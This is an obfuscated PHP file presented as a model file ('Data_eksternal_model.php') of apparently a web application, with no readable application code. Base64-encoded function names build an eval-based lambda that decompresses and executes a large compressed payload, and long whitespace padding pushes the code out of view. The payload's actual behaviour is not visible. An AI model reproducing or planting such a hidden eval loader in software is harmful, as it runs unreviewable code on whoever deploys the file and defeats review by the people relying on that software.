<?php 
        $__='printf';$_='Loading donjo-app/models/Data_eksternal_model.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
